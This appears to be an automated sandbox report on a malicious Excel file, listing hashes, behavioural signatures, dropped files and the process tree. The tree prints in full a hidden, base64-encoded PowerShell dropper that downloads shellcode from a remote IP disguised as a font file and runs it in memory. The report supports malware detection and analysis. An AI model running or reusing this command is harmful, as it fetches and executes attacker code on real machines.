Analysis

  • max time kernel
    33s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:52

General

  • Target

    34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1.xls

  • Size

    46KB

  • MD5

    d26eae53bd39b5faea126221160286df

  • SHA1

    9b8fcba864831924ab5fcb1c0a7d9d7c0fd2b7d4

  • SHA256

    34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1

  • SHA512

    2efd25b6041942de6e044dbb8ad53418277178abf91a65664cd2bc384f54724951d16b4ceab6e47f80751fc84467a86e6e1d007252a3508ad9ac7bcaccdbb001

  • SSDEEP

    768:r4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:8SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3524
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\bbguofy5\CSCF022F0707A554A768A12D6D0ED7FEC5A.TMP"
          4⤵
            PID:3016

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp

      Filesize

      1KB

      MD5

      2d21d8417094ab97e94c9f60ce27fc7d

      SHA1

      66870f88c40ba0c154b3518c99e6b4298808316d

      SHA256

      5564ec882a334d322e76632e411a30f6a577510b9bfeac8ceaabd7081eb83948

      SHA512

      3e624ee3e7bbef6beab56037e75d1a92960f603a6c471573a67e61c01ba090ef9514250e2d62bdfba9871a7688560019dcf7ef2c2a7489b893a1aead7d5cf143

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsgymzgt.fc1.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.dll

      Filesize

      3KB

      MD5

      9222ea97a6a4babf39f94c32fa9b723d

      SHA1

      fd757ce846b7dcfa2008189a71f0e5398ecee87e

      SHA256

      f952e3d89de32eccefefd74061abaa008a6f024ef6ce779e619be81934881903

      SHA512

      f57f0e1e9f0ac5c721bbd831a7993d764dfdcae44e51520558ca0100b7a2f044417bf80bc0267c098ef9e24617eb366d9c9b80351bb1d5a57a089a698cb4df6d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      3a4acf7da177d06f82f53dbc70c96f08

      SHA1

      39767071696d5e757e6a73cce0beb472eefce10a

      SHA256

      2e7f0882f7a64145e976d3a194e6dd5fd77227c259b43a05360e9d7bc655e4a7

      SHA512

      f928887e91e1405f956477fc9c571788dc83aebd97c2cd23c0bab15b9677323e9051da80d9ca29972d450244a103d03c24d6052961946be87531a0f995fcfc71

    • \??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\CSCF022F0707A554A768A12D6D0ED7FEC5A.TMP

      Filesize

      652B

      MD5

      d1ff064f91438a38870f318743eac1b9

      SHA1

      50d7576ca1ba37866fad04a01077f8881c2f5a84

      SHA256

      aeab426bf320e7dc8a75d8c018f45d71fe94fe497654d980e5468b2d8d47ecd1

      SHA512

      ba9480f0d34bc3822a29257a99df00021b7bb0a880b43d74100f09113d55b65521184bd1564cb26122e23fcc90a707dca8be62cc2719652b216adf99027572df

    • \??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.cmdline

      Filesize

      369B

      MD5

      5b48498f851129ecf57c2e0faf9011cc

      SHA1

      78687940f626de320832a42035aeb21a69d52239

      SHA256

      664fb67cde2a61f02b3b876240461ccce8ad2c230489a20290e62a34d6d2bfd7

      SHA512

      1f6f5a7a4299f037d00a3d6754c5a1a5f94d1cc43d8dc1dec54e974894b1a25721a28de3b7cfddf8cf8decfe8f48964c1426e220279d177361d70c4b144d8f6e

    • memory/2040-9-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-33-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-13-0x00007FF9DB5E0000-0x00007FF9DB5F0000-memory.dmp

      Filesize

      64KB

    • memory/2040-0-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp

      Filesize

      64KB

    • memory/2040-7-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-14-0x00007FF9DB5E0000-0x00007FF9DB5F0000-memory.dmp

      Filesize

      64KB

    • memory/2040-16-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-18-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-21-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-20-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-19-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-17-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-23-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-22-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-15-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-6-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-5-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp

      Filesize

      64KB

    • memory/2040-10-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-32-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-12-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-1-0x00007FFA1DA0D000-0x00007FFA1DA0E000-memory.dmp

      Filesize

      4KB

    • memory/2040-11-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-8-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-4-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp

      Filesize

      64KB

    • memory/2040-3-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp

      Filesize

      64KB

    • memory/2040-2-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp

      Filesize

      64KB

    • memory/2040-72-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-65-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-66-0x00007FFA1DA0D000-0x00007FFA1DA0E000-memory.dmp

      Filesize

      4KB

    • memory/2040-67-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/2040-71-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp

      Filesize

      2.0MB

    • memory/3524-61-0x00000248575D0000-0x00000248575D8000-memory.dmp

      Filesize

      32KB

    • memory/3524-45-0x00000248575E0000-0x0000024857602000-memory.dmp

      Filesize

      136KB